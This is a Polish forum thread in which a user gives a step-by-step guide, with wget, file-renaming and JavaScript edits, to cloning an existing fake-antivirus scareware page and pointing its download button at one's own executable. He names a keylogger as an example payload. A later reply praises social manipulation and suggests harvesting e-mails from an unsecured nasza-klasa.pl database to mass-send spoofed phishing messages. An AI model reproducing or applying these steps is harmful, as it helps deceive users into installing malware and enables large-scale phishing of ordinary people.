oszukać oszusta by oszukiwać innych

RobertG

Użytkownik
Dołączył
Styczeń 3, 2007
Posty
391
Intro
Ponoć jest masa stron phishingowych i ogólnie niebezpiecznych, jeżeli znajdziemy jakąś w necie możemy ją przerobić dla swoich potrzeb (czyli by np. podesłać komuś keyloggera). Takie stronki są przygotowane przez 'specjalistów' więc wyglądają dość profesjonalnie i są pomysłowe. O ile nie jestem zwolennikiem czegoś takiego, to dla czystej ciekawości sprawdziłem, jak to zrobić.

Jak?
Zakładam, że czytelnik korzysta z Linuksa
<
Ja przerobiłem (strona nachalnie próbuje zainstalować (pewnie syfny) soft - nie klikaj jak się boisz) fake ze stronki:
http://antivirus-scanner.com/1/?xx=1&in=2&h=1
Trzeba ściągnąć kompletną stronę z plikami js, css, obrazkami etc. na dysk (wget pod linuksem):
Kod:
wget --mirror [url]http://antivirus-scanner.com/1/?xx=1&in=2&h=1[/url]
Parametry przekazywane do index.html nie są potrzebne, wywalmy to z nazwy:
Kod:
mv index.html\?xx\=1 index.html
Uporządkujmy pliki, by był w jednym katalogu (dla estetyki):
Kod:
cp ../common/destrub.php\?ag\=false\&xx\=1\&end\=false\&g\=false\&in\=0\&h\=0 ./engine.js
Teraz, trzeba zmienić URL do tego pliku, tak by był poprawny - w index.html w linijce 22 zmieńmy na:
Kod:
<script type="text/javascript" src="./engine.js"></script>
OK, całość działa i oryginalnie wyglada, musimy jednak zmienić go tak, by serwował ofierze to co my chcemy, poszukajmy, gdzie jest odniesienie do pliku exe, który ma być ściagany:
Kod:
grep -nR exe *
otrzymamy:
Kod:
engine.js:109:var dlink_exe =  "/download/CleanerInstall.exe";
index.html:194:            Name: AtnvrsInstall.exe

script.js:95:      var myWin = window.open("http://antivirus-scanner.com/download/AtnvrsInstall.exe");
script.js:98:      downloadLink.document.location = "http://antivirus-scanner.com/download/AtnvrsInstall.exe";

trzeba zmienić linijkę 108,109, na URL do naszego pliku exe:
Kod:
108 var dlink =  "/download/";
109 var dlink_exe =  "/download/CleanerInstall.exe";
na np:
Kod:
108 var dlink =  "/testy/antivirus-scanner.com/1/logo.exe";
109 var dlink_exe =  '/testy/antivirus-scanner.com/1/logo.exe'//"/download/CleanerInstall.exe";


Podsumowanie
Chodziło mi o to, że czyiś fake można przerobić/przeanalizować według uznania. Taki fake wygląda znacznie lepiej niż robiony od podstaw przez siebie (chyba). Nie trzeba przy tym analizować działania skryptu, wystarczy sie skupić na tym, co przerobić 'by działało u mnie'.

Tu jest moja przeróbka (ściągany plik jest OK, to tak na prawdę obrazek):
http://rgawron.megiteam.pl/testy/antivirus...om/1/index.html
 

fr0zon

Użytkownik
Dołączył
Styczeń 12, 2007
Posty
147
Mam prośbe. Mógłbys całość wrzucić w zipie na jakiś mirror ?/
 

RobertG

Użytkownik
Dołączył
Styczeń 3, 2007
Posty
391
// link nieaktywny
(no ale po to jest moje info jak to zrobić samemu, nie trzeba Ci paczki z tym)
 
Ostatnio edytowane przez moderatora:

fr0zon

Użytkownik
Dołączył
Styczeń 12, 2007
Posty
147
Wiesz ja mam kompa 24/h i nie mam go na linuxie z wgetem... a nie moge resa robic bo upam nonstop... wiec poprosilem
<

Dzieki z gory za upa
<
 

bismak

Użytkownik
Dołączył
Czerwiec 28, 2007
Posty
33
Nie wiem jak u was ale u mnie nie otwiera odrazu pliku exe tylko uruchamia się pobieranie plików?
A tak to juz każdy się zorientuje ze plik jest z końcówką exe.
 

RobertG

Użytkownik
Dołączył
Styczeń 3, 2007
Posty
391
No tak, Mi chodziło o to, że ten plik exe który pobierasz, gdy klikniesz na mój fake nie jest szkodliwy, bo to tylko obrazek ze zmienioną końcówką na exe. To nie jest exploit, przyjrzyj sie temu uważnie to zobaczysz jak to ma działać
smile.gif
 

Dark Smark

Były Moderator
Dołączył
Kwiecień 29, 2006
Posty
1953
Nie wiem jak u was ale u mnie nie otwiera odrazu pliku exe tylko uruchamia się pobieranie plików?
A tak to juz każdy się zorientuje ze plik jest z końcówką exe.

Bo to nie jest luka oprogramowania (exploit) tylko manipulowanie ludźmi (nabieranie, socjotechnika) poprzez tzn phishing (w tym przypadku nie do końca phishing ale też ma nabierać ludzi na podobnych warunkach) .
Ostatnio była akcja z nasza-klasa.pl zostały rozesłane fake e-maile z informacją że osoba o nicku "blabla" dodał Ciebie do kumpli,
i był link do spreparowanej strony przypominającej nasza-klasa.pl, na środku ostrzeżenie że nie mamy zainstalowanego flash plugina i przycisk umożliwiający ściągnięcie.
Dość proste działanie? Tak! Manipulowanie ludźmi w dzisiejszym świecie jest w każdej dziedzinie życia przydatne.
//Nie musze dodawać że to nie flash player tylko shit był
smile.gif

Oczywiście w połączeniu z niezabezpieczoną bazą danych naszej-klasy możemy wyciągnąć sobie e-maile i rozesłać masowo fake wiadomości z sfałszowanym nagłówkiem
%3C
 
Ostatnio edytowane przez moderatora:
Do góry Bottom